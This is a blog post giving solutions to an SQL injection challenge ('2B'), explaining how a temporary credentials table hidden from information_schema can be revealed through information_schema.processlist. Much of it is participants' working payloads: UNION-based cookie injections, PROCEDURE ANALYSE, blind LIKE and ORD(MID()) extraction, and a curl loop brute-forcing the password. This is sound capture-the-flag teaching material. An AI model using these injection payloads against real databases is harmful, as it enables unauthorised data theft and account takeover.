Solutions for challenge 2B

Solutions for challenge 2B

Posted on August 16, 2012 by Roberto Salgado

After posting the solutions for challenge 2A from the series of SQL Injection challenges, it only made sense to continue with 2B; considering that 'B' is a slighty more difficult variation of 'A'. Challenge 2B is probably my favorite challenge because of its simplicity, yet how confusing it was for many participants.



DISCLAIMER: If you haven't tried this challenge, it is still available here (no longer available online) in case you want to give it a shot before reading the SOLUTIONS below.

This challenge, similar to 2A, allows you to log in as guest and creates the cookie user_id which is vulnerable to SQL Injection. Initially no filtering was used since the idea behind the challenge was to figure out different ways of retrieving the table/column name. What is tricky about this challenge is that it uses a temporary table to store the credentials and the temp table only exists during the PHP script's execution. The thing about temporary tables is that they do not appear in information_schema.tables/columns, so this was the perfect way of making participants figure out other methods for obtaining the table/column names.

The intended solution is to use information_schema.proccesslist, which is available starting from MySQL 5.1. Injecting union select info from information_schema.processlist will return the whole query being used which can be extremely useful when table_name/column_name are being blocked by a WAF/IDS.


-1 union select info from information_schema.processlist

SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info from information_schema.processlist

Challenge Modifications

After w00d's and Miroslav's solutions, I made 2 slight adjustments to the challenge, so that it would be solved as intended. W00d's solution used PROCEDURE ANALYSE(), so I decided to block the word 'PROCEDURE', since this method is already documented on The SQL Injection KB; w00d later submitted a solution using the intended method. As for Miroslav, he was able to find the column name through a dictionary attack using the txt/common-columns.txt file from sqlmap. The second modification was to change the column names so they could no longer be guessed.




user_id= 3 union select 1,2,concat_ws(0x3a,command,time,state,info),4 from information_schema.processlist limit 1-- -





curl -i --cookie "user_id=0 limit 3,1 PROCEDURE ANALYSE()"

curl -i --cookie "user_id=-1 union select group_concat(info),2 from information_schema.processlist"

Miroslav Stampar:


user_id=0 AND ORD(MID(temp_password,17,1))>1 LIMIT 0,1


user_id=-1 union select info,'padding' from information_schema.processlist#


user_id=0+and+1=0+union+select+1,unhex(hex(concat_ws(0x3a,info,state)))+from information_schema.processlist limit 0,1

user_id=0 and websec_rocks_temp_password like 'a%'


Used processlist

user_id=0 and websec_rocks_temp_password like '%'


Used processlist

for i in {4,5,6,7} ; do for j in {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} ; do curl -b "user_id=-9 or websec_rocks_temp_password LIKE 0x454c5f4d55595f56455247${i}${j}25" 2>&1 | grep ADMIN ; echo $i$j ;done; done


user_id=-1 union select info,2 from information_schema.processlist limit 1;

user_id=0 and (@:=websec_rocks_temp_password) union select @,1;


user_id=5 UNION select 1,(select info from information_schema.processlist LIMIT 1)

Same script from challenge 2A.


Used processlist


Submitted a Python script found here.


user_id=-1 union select 1,info from information_schema.PROCESSLIST limit 0,1#

user_id=0 and LENGTH(websec_rocks_temp_password)=16#

user_id=0 and websec_rocks_temp_password like 0x25656c5f6d75795f76657267756974617325#


A full list of the victors for each challenge is available here.


Latest Blog Entries

New publication: Mastering the Nmap Scripting Engine
We invite you to learn more about the latest publication from our team, "Mastering the Nmap Scripting Engine".

Presentation on Optimization and Obfuscation Techniques for SQL Injections
A couple years ago Roberto Salgado had the honor of presenting his research on SQL Injections at several conferences. Just recently, Blackhat released the video of his presentation. This post contains the link to Roberto's slides and video.

Backdoors in Zhone GPON 2520 and Alcatel Lucent I240Q
While examining the "dropbear" binary for the Zhone GPON 2520 and Alcatel Lucent I240Q, we found that both routers have backdoors that allow users with SSH access to connect to these devices with maximum privileges.

Latest News

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.

Websec present at Campus Party 2014
Websec will be participating with four conferences at the largest Campus Party ever held, which will take place from the 24-29 of June in Guadalajara, Mexico.